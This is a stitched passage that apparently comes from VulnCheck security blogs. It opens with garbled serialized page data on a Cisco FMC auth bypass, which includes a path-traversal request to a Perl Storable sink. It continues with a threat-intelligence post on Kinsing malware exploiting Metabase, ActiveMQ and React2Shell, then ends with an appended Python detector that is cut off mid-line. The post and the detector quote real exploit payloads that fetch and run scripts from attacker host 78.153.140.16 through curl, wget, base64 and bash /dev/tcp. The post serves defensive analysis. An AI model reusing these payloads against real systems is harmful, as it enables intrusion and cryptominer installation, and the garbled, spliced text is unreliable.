Storable::lock_retrieve(",[1373,9824,4644],{"class":1383},[1373,9826,9827],{"class":4640},"fn);\n",[1373,9829,9830],{"class":1375,"line":7598},[1373,9831,9832],{"class":4640},"            }\n",[1373,9834,9835],{"class":1375,"line":7615},[1373,9836,9837],{"class":4636},"            else\n",[1373,9839,9840],{"class":1375,"line":7635},[1373,9841,9814],{"class":4640},[1373,9843,9844,9846,9849,9851],{"class":1375,"line":7640},[1373,9845,9819],{"class":1383},[1373,9847,9848],{"class":4640},"deserialized_data = 
Storable::retrieve(",[1373,9850,4644],{"class":1383},[1373,9852,9827],{"class":4640},[1373,9854,9855],{"class":1375,"line":7648},[1373,9856,9832],{"class":4640},[1373,9858,9859],{"class":1375,"line":7672},[1373,9860,9861],{"class":4640},"        }\n",[1373,9863,9864],{"class":1375,"line":7688},[1373,9865,9866],{"class":4636},"        else\n",[1373,9868,9869],{"class":1375,"line":7709},[1373,9870,9788],{"class":4640},[1373,9872,9873,9876,9878,9881,9883,9885,9888,9890],{"class":1375,"line":7714},[1373,9874,9875],{"class":1379},"            warn",[1373,9877,4883],{"class":1387},[1373,9879,9880],{"class":1391},"Unable to locate file for retrieval: ",[1373,9882,4644],{"class":1383},[1373,9884,9564],{"class":4640},[1373,9886,9887],{"class":1391},"->(unknown)",[1373,9889,183],{"class":1387},[1373,9891,4912],{"class":4640},[1373,9893,9894,9897,9899],{"class":1375,"line":7722},[1373,9895,9896],{"class":4636},"            return",[1373,9898,7480],{"class":1379},[1373,9900,4912],{"class":4640},[1373,9902,9904],{"class":1375,"line":9903},38,[1373,9905,9861],{"class":4640},[1373,9907,9909],{"class":1375,"line":9908},39,[1373,9910,4795],{"class":4640},[1373,9912,9914,9916,9918,9920,9922,9924,9926,9928],{"class":1375,"line":9913},40,[1373,9915,9721],{"class":4636},[1373,9917,4641],{"class":4640},[1373,9919,4644],{"class":1383},[1373,9921,9564],{"class":4640},[1373,9923,4667],{"class":1397},[1373,9925,9149],{"class":4640},[1373,9927,9156],{"class":2326},[1373,9929,9809],{"class":4640},[1373,9931,9933],{"class":1375,"line":9932},41,[1373,9934,9613],{"class":4640},[1373,9936,9938,9940,9943,9945,9947,9949,9951,9953],{"class":1375,"line":9937},42,[1373,9939,4727],{"class":1383},[1373,9941,9942],{"class":4640},"deserialized_data = 
Storable::thaw(",[1373,9944,4644],{"class":1383},[1373,9946,9564],{"class":4640},[1373,9948,4667],{"class":1397},[1373,9950,9149],{"class":4640},[1373,9952,9156],{"class":2326},[1373,9954,9712],{"class":4640},[1373,9956,9958],{"class":1375,"line":9957},43,[1373,9959,4795],{"class":4640},[1373,9961,9963],{"class":1375,"line":9962},44,[1373,9964,1855],{"class":4640},[18,9966,9967,9968,9971,9972,9974,9975,9977],{},"By combining the ",[886,9969,9970],{},"licenseValidate"," call with the ",[886,9973,6935],{}," call, we can write arbitrary binary data to ",[886,9976,4484],{},", including Storable serialized Perl. Additionally, the license validation logic appears more than happy to accept arbitrary path traversals:",[1354,9979,9981],{"className":6275,"code":9980,"language":6277,"meta":219,"style":219},"POST \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772810888984 HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes\nContent-Length: 65\nAccept-Language: en-US,en;q=0.9\nContent-Type: application\u002Fjson\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nReferer: https:\u002F\u002F10.0.0.226\u002Frna_policy\u002Frna_policy_creation.cgi\nConnection: keep-alive\n\n[\"d8bcba74049486588e0e2f11dacfee4f\",\n\"batchResults\",\n\"..\u002Flicense.tmp\",\n\"1\"]\n",[886,9982,9983,9996,10004,10012,10021,10029,10037,10045,10054,10062,10066,10079,10089,10099],{"__ignoreMap":219},[1373,9984,9985,9987,9990,9992,9994],{"class":1375,"line":1376},[1373,9986,6946],{"class":4636},[1373,9988,9989],{"class":4640}," \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772810888984 
",[1373,9991,6290],{"class":5387},[1373,9993,2180],{"class":4640},[1373,9995,6295],{"class":5467},[1373,9997,9998,10000,10002],{"class":1375,"line":220},[1373,9999,6301],{"class":6300},[1373,10001,4606],{"class":5387},[1373,10003,6306],{"class":1391},[1373,10005,10006,10008,10010],{"class":1375,"line":1266},[1373,10007,6565],{"class":6300},[1373,10009,4606],{"class":5387},[1373,10011,6570],{"class":1391},[1373,10013,10014,10016,10018],{"class":1375,"line":1852},[1373,10015,6411],{"class":6300},[1373,10017,4606],{"class":5387},[1373,10019,10020],{"class":1391}," 65\n",[1373,10022,10023,10025,10027],{"class":1375,"line":4692},[1373,10024,6986],{"class":6300},[1373,10026,4606],{"class":5387},[1373,10028,6991],{"class":1391},[1373,10030,10031,10033,10035],{"class":1375,"line":4724},[1373,10032,6391],{"class":6300},[1373,10034,4606],{"class":5387},[1373,10036,7000],{"class":1391},[1373,10038,10039,10041,10043],{"class":1375,"line":4756},[1373,10040,6311],{"class":6300},[1373,10042,4606],{"class":5387},[1373,10044,6316],{"class":1391},[1373,10046,10047,10049,10051],{"class":1375,"line":4768},[1373,10048,9024],{"class":6300},[1373,10050,4606],{"class":5387},[1373,10052,10053],{"class":1391}," 
https:\u002F\u002F10.0.0.226\u002Frna_policy\u002Frna_policy_creation.cgi\n",[1373,10055,10056,10058,10060],{"class":1375,"line":4792},[1373,10057,6331],{"class":6300},[1373,10059,4606],{"class":5387},[1373,10061,6336],{"class":1391},[1373,10063,10064],{"class":1375,"line":4798},[1373,10065,6520],{"emptyLinePlaceholder":237},[1373,10067,10068,10070,10072,10075,10077],{"class":1375,"line":4806},[1373,10069,7035],{"class":1383},[1373,10071,183],{"class":1387},[1373,10073,10074],{"class":1391},"d8bcba74049486588e0e2f11dacfee4f",[1373,10076,183],{"class":1387},[1373,10078,9062],{"class":1383},[1373,10080,10081,10083,10085,10087],{"class":1375,"line":4817},[1373,10082,183],{"class":1387},[1373,10084,6935],{"class":1391},[1373,10086,183],{"class":1387},[1373,10088,9062],{"class":1383},[1373,10090,10091,10093,10095,10097],{"class":1375,"line":4825},[1373,10092,183],{"class":1387},[1373,10094,8654],{"class":1391},[1373,10096,183],{"class":1387},[1373,10098,9062],{"class":1383},[1373,10100,10101,10103,10105,10107],{"class":1375,"line":4835},[1373,10102,183],{"class":1387},[1373,10104,467],{"class":1391},[1373,10106,183],{"class":1387},[1373,10108,7103],{"class":1383},[18,10110,10111],{},"Without valid Storable data, the application will respond as follows indicating that the sink above has been reached:",[1354,10113,10115],{"className":6275,"code":10114,"language":6277,"meta":219,"style":219},"HTTP\u002F1.1 404 Not Found\nDate: Fri, 06 Mar 2026 15:35:42 GMT\nServer: Mojolicious (Perl)\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nContent-Type: application\u002Fjson\nContent-Length: 192\nCache-Control: no-store\nX-Frame-Options: SAMEORIGIN\nX-UA-Compatible: IE=edge\nX-Permitted-Cross-Domain-Policies: none\nX-XSS-Protection: 1; mode=block\nReferrer-Policy: same-origin\nContent-Security-Policy: base-uri 'self'; frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\n\n{\"error\":{\"text\":\"Error: 
Magic number checking on storable file failed at \u002Fusr\u002Flib64\u002Fperl5\u002F5.34.1\u002Fx86_64-linux\u002FStorable.pm line 421, at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUtil.pm line 2069.\\n\"}}\n",[886,10116,10117,10131,10140,10148,10156,10164,10173,10181,10189,10197,10205,10213,10221,10229,10237,10245,10253,10257],{"__ignoreMap":219},[1373,10118,10119,10121,10123,10125,10128],{"class":1375,"line":1376},[1373,10120,6290],{"class":5387},[1373,10122,2180],{"class":4640},[1373,10124,6350],{"class":5467},[1373,10126,10127],{"class":5467}," 404",[1373,10129,10130],{"class":1391}," Not Found\n",[1373,10132,10133,10135,10137],{"class":1375,"line":220},[1373,10134,6361],{"class":6300},[1373,10136,4606],{"class":5387},[1373,10138,10139],{"class":1391}," Fri, 06 Mar 2026 15:35:42 GMT\n",[1373,10141,10142,10144,10146],{"class":1375,"line":1266},[1373,10143,6371],{"class":6300},[1373,10145,4606],{"class":5387},[1373,10147,6376],{"class":1391},[1373,10149,10150,10152,10154],{"class":1375,"line":1852},[1373,10151,6381],{"class":6300},[1373,10153,4606],{"class":5387},[1373,10155,6386],{"class":1391},[1373,10157,10158,10160,10162],{"class":1375,"line":4692},[1373,10159,6391],{"class":6300},[1373,10161,4606],{"class":5387},[1373,10163,7000],{"class":1391},[1373,10165,10166,10168,10170],{"class":1375,"line":4724},[1373,10167,6411],{"class":6300},[1373,10169,4606],{"class":5387},[1373,10171,10172],{"class":1391}," 
192\n",[1373,10174,10175,10177,10179],{"class":1375,"line":4756},[1373,10176,6421],{"class":6300},[1373,10178,4606],{"class":5387},[1373,10180,6426],{"class":1391},[1373,10182,10183,10185,10187],{"class":1375,"line":4768},[1373,10184,6431],{"class":6300},[1373,10186,4606],{"class":5387},[1373,10188,6436],{"class":1391},[1373,10190,10191,10193,10195],{"class":1375,"line":4792},[1373,10192,6441],{"class":6300},[1373,10194,4606],{"class":5387},[1373,10196,6446],{"class":1391},[1373,10198,10199,10201,10203],{"class":1375,"line":4798},[1373,10200,6451],{"class":6300},[1373,10202,4606],{"class":5387},[1373,10204,6456],{"class":1391},[1373,10206,10207,10209,10211],{"class":1375,"line":4806},[1373,10208,6461],{"class":6300},[1373,10210,4606],{"class":5387},[1373,10212,6466],{"class":1391},[1373,10214,10215,10217,10219],{"class":1375,"line":4817},[1373,10216,6471],{"class":6300},[1373,10218,4606],{"class":5387},[1373,10220,6476],{"class":1391},[1373,10222,10223,10225,10227],{"class":1375,"line":4825},[1373,10224,6481],{"class":6300},[1373,10226,4606],{"class":5387},[1373,10228,6486],{"class":1391},[1373,10230,10231,10233,10235],{"class":1375,"line":4835},[1373,10232,6491],{"class":6300},[1373,10234,4606],{"class":5387},[1373,10236,6496],{"class":1391},[1373,10238,10239,10241,10243],{"class":1375,"line":4843},[1373,10240,6501],{"class":6300},[1373,10242,4606],{"class":5387},[1373,10244,6506],{"class":1391},[1373,10246,10247,10249,10251],{"class":1375,"line":4849},[1373,10248,6331],{"class":6300},[1373,10250,4606],{"class":5387},[1373,10252,6515],{"class":1391},[1373,10254,10255],{"class":1375,"line":4877},[1373,10256,6520],{"emptyLinePlaceholder":237},[1373,10258,10259,10261,10263,10266,10268,10270,10272,10274,10276,10278,10280,10283,10285,10287],{"class":1375,"line":4915},[1373,10260,9149],{"class":1383},[1373,10262,183],{"class":9152},[1373,10264,10265],{"class":9155},"error",[1373,10267,183],{"class":9152},[1373,10269,8304],{"class":1383},[1373,10271,183],{"class":9152},[1
373,10273,1359],{"class":9165},[1373,10275,183],{"class":9152},[1373,10277,4606],{"class":1383},[1373,10279,183],{"class":9173},[1373,10281,10282],{"class":9176},"Error: Magic number checking on storable file failed at \u002Fusr\u002Flib64\u002Fperl5\u002F5.34.1\u002Fx86_64-linux\u002FStorable.pm line 421, at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUtil.pm line 2069.",[1373,10284,8943],{"class":2326},[1373,10286,183],{"class":9173},[1373,10288,9238],{"class":1383},[18,10290,10291,10292,10295,10296,4606],{},"Since the DeSerialize routine above explicitly enables the ",[886,10293,10294],{},"$Storable::Eval"," setting, there is a high likelihood that the module may be useful for attackers. The Storable documentation even calls this pattern out directly as ",[47,10297,10300],{"href":10298,"rel":10299},"https:\u002F\u002Fmetacpan.org\u002Fpod\u002FStorable#SECURITY-WARNING",[51],"potentially vulnerable",[18,10302,10303],{},[68,10304],{"alt":10305,"src":10306},"Storable serialization warning.","\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079\u002Fstorable-warning.png",[18,10308,10309,10310,10313,10314,10316],{},"After examining Storable test cases and generating Storable data that was written via the license path, the team was eventually able to generate ",[886,10311,10312],{},"CODE"," Perl-serialized data and interact with the ",[886,10315,8677],{}," logic. We were not able, however, to find a sink or gadget that was a candidate for bootstrapping to code execution before we found the installer path to RCE. 
It’s likely that some Perl wizard out there will be able to find an additional path to execution using this logic.",[18,10318,10319,10320,10325],{},"An exploit, PCAPs, a YARA rule, and network signatures for five different variants ",[47,10321,10324],{"href":10322,"rel":10323},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2026-03-20#cve-2026-20079-cisco-firewall-management-center-authentication-bypass",[51],"are available"," to VulnCheck Initial Access Intelligence customers for CVE-2026-20079.",[61,10327,202],{"id":201},[18,10329,10330,10331,1246,10335,1255,10340,59],{},"VulnCheck’s Initial Access Intelligence team is always on the hunt for new exploits and fresh shells. By delivering machine-consumable, evidence-driven intelligence on new vulnerabilities and how real attackers can use them in the wild, VulnCheck helps organizations prepare earlier, respond decisively, and verify exploitation without relying on inaccurate scores or delayed consensus. For more research like this, see ",[47,10332,10334],{"href":1007,"rel":10333},[51],"Herding Cats: Recent Cisco SD-WAN Manager Vulnerabilities",[47,10336,10339],{"href":10337,"rel":10338},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Ftriofox-exploit-cve-2025-12480",[51],"Tales from the Exploit Mines: Gladinet Triofox CVE-2025-12480 RCE",[47,10341,10344],{"href":10342,"rel":10343},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fsmartermail-connecttohub-rce-cve-2026-24423",[51],"Street Smarts: SmarterMail ConnectToHub Unauthenticated RCE (CVE-2026-24423)",[18,10346,1228,10347,1234,10350,1240,10353,1246,10356,1255,10359,1260],{},[47,10348,1233],{"href":1231,"rel":10349},[51],[47,10351,1239],{"href":1237,"rel":10352},[51],[47,10354,1245],{"href":1243,"rel":10355},[51],[47,10357,1251],{"href":1249,"rel":10358},[51],[47,10360,216],{"href":1258,"rel":10361},[51],[2901,10363,10364],{},"html pre.shiki code .ss--_, html code.shiki 
(Preceding post fragment, slug cisco-fmc-auth-bypass-cve-2026-20079, dated 2026-03-26: VulnCheck's Initial Access Intelligence team analysis of CVE-2026-20079, an authentication bypass and remote code execution vulnerability in Cisco Secure Firewall Management Center.)

## The Return of the Kinsing

Jacob Baines ([@Junior_Baines](https://twitter.com/Junior_Baines)), 2026-03-26

### Key Takeaways

- Canary Intelligence analysis tied the exploitation of CVE-2023-46604, CVE-2023-38646, and CVE-2025-55182 to the same Kinsing infrastructure.
- The activity ran through fresh infrastructure, with the Kinsing attacker node 212.113.98.30 first appearing in our canary network on March 12, 2026.
- This is the first time we observed Kinsing associated with CVE-2025-55182 in our canary network.

Our [Canary Intelligence](https://www.vulncheck.com/blog/introducing-vulncheck-canary-intelligence) team was analyzing attacker infrastructure clustering when we had two epiphanies. The first was that the RondoDox botnet needs to calm the fuck down. You're all over the place, and you need to stop naming your stuff after poop. At least try to act like you have a clue, ok?

The second, and more useful, was that [Kinsing](https://api.vulncheck.com/v3/index/botnets?botnet=kinsing) had surfaced in our canary network.

Our clustering grouped three CVEs around a shared set of [Kinsing](https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing) infrastructure. The first two, [CVE-2023-46604](https://console.vulncheck.com/cve/CVE-2023-46604) (ActiveMQ) and [CVE-2023-38646](https://console.vulncheck.com/cve/CVE-2023-38646) (Metabase), are well-known Kinsing exploit paths documented by [Trend Micro](https://www.trendmicro.com/en_us/research/23/k/cve-2023-46604-exploited-by-kinsing.html) and [Sekoia](https://blog.sekoia.io/activemq-cve-2023-46604-exploited-by-kinsing-and-overview-of-this-threat/). In our canary network, exploitation from the Kinsing attacker node, 212.113.98.30, began on March 12, 2026, and converged on the same staging host, 78.153.140.16.

Kinsing exploitation of [CVE-2023-38646](https://console.vulncheck.com/cve/CVE-2023-38646). The request abuses Metabase's setup endpoint to hand the H2 JDBC driver an `INIT=` string that defines a Java alias and then calls it:

```http
POST /api/setup/validate HTTP/1.1
Host: VC_REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Content-Length: 573
Content-Type: application/json
Accept-Encoding: gzip
{
  "token": "9b29cb2d-286a-4374-a0a8-11e10b2aaf7b",
  "details": {
    "details": {
      "subprotocol": "h2",
      "classname": "org.h2.Driver",
      "advanced-options": true,
      "subname": "mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(new String[]{\"sh\", \"-c\", cmd})\\;}$$\\;CALL SHELLEXEC('(curl -s 78.153.140.16/mt.sh||wget -q -O- 78.153.140.16/mt.sh)|bash');"
    },
    "name": "x",
    "engine": "postgres"
  }
}
```

Kinsing exploitation of [CVE-2023-46604](https://console.vulncheck.com/cve/CVE-2023-46604). The OpenWire message names `ClassPathXmlApplicationContext` as the class to instantiate, so the broker loads Spring bean definitions from an attacker-supplied XML URL:

```text
...o.............Borg.springframework.context.support.ClassPathXmlApplicationContext...http://78.153.140.16/acb.xml
```

As shown above, the Metabase exploitation path retrieves `http://78.153.140.16/mt.sh`, while the ActiveMQ path retrieves `http://78.153.140.16/acb.xml`.

Fetching `mt.sh`, we found a script exactly as described in [Fortinet](https://www.fortinet.com/blog/threat-research/old-miner-new-tricks)'s July 2025 Kinsing writeup. The script includes distinctive and exhausting lists of processes to kill and crontab entries to overwrite. More importantly, it downloads the core Kinsing components:

```bash
BIN_MD5="b3039abf2ad5202f4a9363b418002351"
BIN_DOWNLOAD_URL="http://78.153.140.16/kinsing"
BIN_DOWNLOAD_URL2="http://78.153.140.16/kinsing"
CURL_DOWNLOAD_URL="http://78.153.140.16/curl-amd64"

SO_FULL_PATH="$BIN_PATH/$SO_NAME"
SO_DOWNLOAD_URL="http://78.153.140.16/libsystem.so"
SO_DOWNLOAD_URL2="http://78.153.140.16/libsystem.so"
SO_MD5="ccef46c7edf9131ccffc47bd69eb743b"
```

What `mt.sh` downloads and installs is classic Kinsing. The main payload, kinsing, is a Go-based Linux binary. `libsystem.so` is the nastier bit. [Multiple](https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html) [sources](https://1665891.fs1.hubspotusercontent-na1.net/hubfs/1665891/Threat%20reports/AquaSecurity_Kinsing_Demystified_Technical_Guide.pdf) describe Kinsing installing libsystem.so and registering it in `/etc/ld.so.preload`, exactly as mt.sh does here. Because the dynamic loader injects every library listed in that file into each new dynamically linked process, the library can hook libc calls such as directory listing and /proc reads and hide the miner's files and network activity from ordinary user-space tools. That means this script is not just dropping an old bot. It is dropping the familiar Kinsing combination of payload, persistence, and stealth.

At this point, the Canary Intelligence team saw the Metabase and ActiveMQ activity as the return of Kinsing on fresh infrastructure. What made the cluster even more interesting was that Kinsing had one more CVE to add: [CVE-2025-55182](https://console.vulncheck.com/cve/CVE-2025-55182) (React2Shell).

![And my axe!](/blog/return-of-the-kinsing/gimli.png)

We can tie this activity to Kinsing because the attacker IP, `212.113.98.30`, is the same address we observed exploiting [CVE-2023-46604](https://console.vulncheck.com/cve/CVE-2023-46604) and [CVE-2023-38646](https://console.vulncheck.com/cve/CVE-2023-38646), both of which led to the same staging infrastructure at `78.153.140.16`.

For brevity, we focus here on the command-execution portion of the [CVE-2025-55182](https://console.vulncheck.com/cve/CVE-2025-55182) payload. Using the vulnerability's JavaScript execution primitive, Kinsing invokes `child_process.execSync(...)` to decode and run the following bash stager.

```javascript
process.mainModule.require('child_process').execSync('echo IyEvYmluL2Jhc2gKZnVuY3Rpb24gX19jdXJsKCkgewogIHJlYWQgcHJvdG8gc2VydmVyIHBhdGggPDw8JChlY2hvICR7MS8vLy8gfSkKICBET0M9LyR7cGF0aC8vIC8vfQogIEhPU1Q9JHtzZXJ2ZXIvLzoqfQogIFBPUlQ9JHtzZXJ2ZXIvLyo6fQogIFtbIHgiJHtIT1NUfSIgPT0geCIke1BPUlR9IiBdXSAmJiBQT1JUPTgwCgogIGV4ZWMgMzw+L2Rldi90Y3AvJHtIT1NUfS8kUE9SVAogIGVjaG8gLWVuICJHRVQgJHtET0N9IEhUVFAvMS4wXHJcbkhvc3Q6ICR7SE9TVH1cclxuXHJcbiIgPiYzCiAgKHdoaWxlIHJlYWQgbGluZTsgZG8KICAgW1sgIiRsaW5lIiA9PSAkJ1xyJyBdXSAmJiBicmVhawogIGRvbmUgJiYgY2F0KSA8JjMKICBleGVjIDM+Ji0KfQoKX19jdXJsIGh0dHA6Ly83OC4xNTMuMTQwLjE2L3JlLnNofGJhc2g=|base64 -d|bash')
```

For readability, the base64-decoded stager is shown below.

```bash
#!/bin/bash
function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

__curl http://78.153.140.16/re.sh|bash
```

The stager is crude, but effective. Instead of relying on host utilities like curl or wget, it uses bash's `/dev/tcp` pseudo-device (a feature of the shell itself, not a file on disk) to fetch `re.sh` directly from `78.153.140.16` and pipe it straight into bash without writing it to disk. That is the important part: [CVE-2025-55182](https://console.vulncheck.com/cve/CVE-2025-55182) exploitation points to the same staging infrastructure. When we compared re.sh to the other Kinsing stagers in this cluster, the differences were minimal. In other words, there was nothing new here. This was just another tool in the Kinsing toolbox.

This is exactly the kind of clustering Canary Intelligence is good at surfacing. Exploitation of [CVE-2023-46604](https://console.vulncheck.com/cve/CVE-2023-46604), [CVE-2023-38646](https://console.vulncheck.com/cve/CVE-2023-38646), and CVE-2025-55182 all led back to the same infrastructure. If nothing else, it is a reminder that older malware families do not need new binaries to stay relevant. Sometimes they just need one more CVE.

### Indicators of Compromise

| Type | Value | Description |
| --- | --- | --- |
| Attacker IP | 212.113.98.30 | Exploitation node |
| Staging Host | 78.153.140.16 | Shared staging infrastructure |
| URL | `http://78.153.140.16/acb.xml` | ActiveMQ delivery artifact |
| URL | `http://78.153.140.16/mt.sh` | Metabase stager |
| URL | `http://78.153.140.16/re.sh` | CVE-2025-55182 stager |
| SHA1 | [596470fd9031b76eddde02568f7d5dee7a66a910](https://www.virustotal.com/gui/file/e60e7bd42ea0fd29523f6f27dc8005b6a5c68f23d105fd3952b0275b30325f18) | acb.xml |
| SHA1 | [df7367261598cfed1fca9fd11504071937f38350](https://www.virustotal.com/gui/file/f65fba5d584c265f92c3628ed8f3c05c5d0c65fc9947d1af907a2df49fea5cf6) | mt.sh |
| SHA1 | [53a1aed3075140e6bc568f093b1f5a151ecc7dc9](https://www.virustotal.com/gui/file/afc7822d9e561982f5ed22faf76b35ad4b432eaa6cac0cd0fcafc9e67314a8fd) | re.sh |
| SHA1 | [6feb75ac62120bae1e92ab16184c1eb0b795e4b3](https://www.virustotal.com/gui/file/6b9e23cb675be370a18a0c4482dc566be28920d4f1cd8ba6b4527f80acf978d3) | curl-amd64 |
| SHA1 | [38c56b5e1489092b80c9908f04379e5a16876f01](https://www.virustotal.com/gui/file/c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a) | libsystem.so |
| SHA1 | [0ceb8ffb0be23b808b534d744440f4367e17b9c5](https://www.virustotal.com/gui/file/787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c) | kinsing |

The VirusTotal links are keyed by each file's SHA-256; the values in the table are the SHA-1 hashes.

### Related

VulnCheck's research team tracks real-world exploitation, attacker infrastructure, and exploit workflows using our Canary Intelligence, Exploit & Vulnerability Intelligence (EVI), and Initial Access Intelligence datasets. For more research like this check out our blogs, [*Frost Checks First*](https://www.vulncheck.com/blog/frost-checks-first), [*The Mystery OAST Host Behind a Regionally Focused Exploit Operation*](https://www.vulncheck.com/blog/mystery-oast), and [*XWiki Under Increased Attack*](https://www.vulncheck.com/blog/xwiki-under-increased-attack).

Summary: Canary Intelligence linked exploitation of CVE-2023-46604, CVE-2023-38646, and CVE-2025-55182 to the same Kinsing infrastructure, including a shared staging host and attacker IP first seen in the canary network on March 12, 2026. The research shows how an older malware family is still adapting by adding new exploit paths while continuing to rely on established infrastructure.
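Detection logic for the two delivery payloads quoted in the post, as an added example (this is not code from the VulnCheck post or from the Kinsing toolkit). It parses the Metabase `/api/setup/validate` request for an H2 JDBC `INIT=` string that defines a Java alias, decodes the `execSync('echo ...|base64 -d|bash')` one-liner and checks for the bash `/dev/tcp` fetch, then extracts the staging URL each would retrieve and matches the host against the IOC table. The two sample inputs are copied from the post (the Metabase request's headers are abridged and its JSON whitespace compacted); the IOC host set, the regexes and the function names are assumptions made for this example.

```python
"""Parse the two Kinsing delivery payloads quoted above and extract the staging URL each fetches.

Added example, not code from the VulnCheck post or from the Kinsing toolkit. The sample
request and execSync() one-liner are copied from the post; the IOC host set, regexes and
function names are assumptions made here.
"""
from __future__ import annotations

import base64
import json
import re
from dataclasses import dataclass, field

KINSING_HOSTS = {"212.113.98.30", "78.153.140.16"}  # hosts from the post's IOC table
# H2 JDBC INIT= abuse: CREATE ALIAS <name> AS $$ ...java... $$ is the code-execution primitive.
H2_ALIAS_RE = re.compile(r"INIT=.*?CREATE\s+ALIAS\s+(\w+)", re.IGNORECASE | re.DOTALL)
B64_STAGER_RE = re.compile(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+-d")  # echo <b64> | base64 -d
IPV4_URL_RE = re.compile(r"(?:https?://)?(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(/[\w./-]*)")  # 78.153.140.16/mt.sh


@dataclass
class Finding:
    source: str
    reason: str
    urls: list[str] = field(default_factory=list)

    @property
    def matched_hosts(self) -> set[str]:
        """Hosts in the extracted URLs that appear in the IOC table."""
        return {u.split("/", 1)[0] for u in self.urls} & KINSING_HOSTS


def extract_urls(text: str) -> list[str]:
    """Unique host/path strings (scheme and port stripped) in first-seen order."""
    urls: list[str] = []
    for host, path in IPV4_URL_RE.findall(text):
        if host + path not in urls:
            urls.append(host + path)
    return urls


def _walk_strings(obj):
    """Yield every string value in a nested JSON document."""
    if isinstance(obj, dict):
        obj = list(obj.values())
    if isinstance(obj, list):
        for value in obj:
            yield from _walk_strings(value)
    elif isinstance(obj, str):
        yield obj


def inspect_metabase_request(raw: str) -> Finding | None:
    """Flag a POST /api/setup/validate whose JDBC subname carries an H2 INIT= alias (CVE-2023-38646 pattern)."""
    lines = raw.splitlines()
    if not lines or lines[0].split()[:2] != ["POST", "/api/setup/validate"]:
        return None
    # Captures pasted into reports often lose the blank header/body separator, so accept
    # either a blank line or the first line that opens a JSON object as the body start.
    body_start = next((i for i, ln in enumerate(lines) if i and (ln == "" or ln.lstrip().startswith("{"))), None)
    if body_start is None:
        return None
    try:
        doc = json.loads("\n".join(lines[body_start:]))
    except json.JSONDecodeError:
        return None
    for value in _walk_strings(doc):
        match = H2_ALIAS_RE.search(value)
        if match:
            return Finding("metabase", f"H2 INIT= defines alias {match.group(1)}", extract_urls(value))
    return None


def inspect_js_payload(js: str) -> Finding | None:
    """Decode an execSync('echo <b64>|base64 -d|bash') stager and look for a bash /dev/tcp fetch."""
    match = B64_STAGER_RE.search(js) if "execSync" in js else None
    if not match:
        return None
    b64 = match.group(1)
    decoded = base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-8", "replace")
    if "/dev/tcp/" not in decoded:
        return None
    return Finding("react2shell", "base64 stager fetching over bash /dev/tcp", extract_urls(decoded))


# Copied from the post (Host already redacted there); minor headers omitted, JSON compacted.
METABASE_REQUEST = r"""POST /api/setup/validate HTTP/1.1
Host: VC_REDACTED
Content-Length: 573
Content-Type: application/json
{"token": "9b29cb2d-286a-4374-a0a8-11e10b2aaf7b",
 "details": {"details": {"subprotocol": "h2", "classname": "org.h2.Driver", "advanced-options": true,
   "subname": "mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(new String[]{\"sh\", \"-c\", cmd})\\;}$$\\;CALL SHELLEXEC('(curl -s 78.153.140.16/mt.sh||wget -q -O- 78.153.140.16/mt.sh)|bash');"},
  "name": "x", "engine": "postgres"}}
"""

# Copied from the post: the command-execution portion of the CVE-2025-55182 payload.
REACT2SHELL_PAYLOAD = (
    "process.mainModule.require('child_process').execSync('echo "
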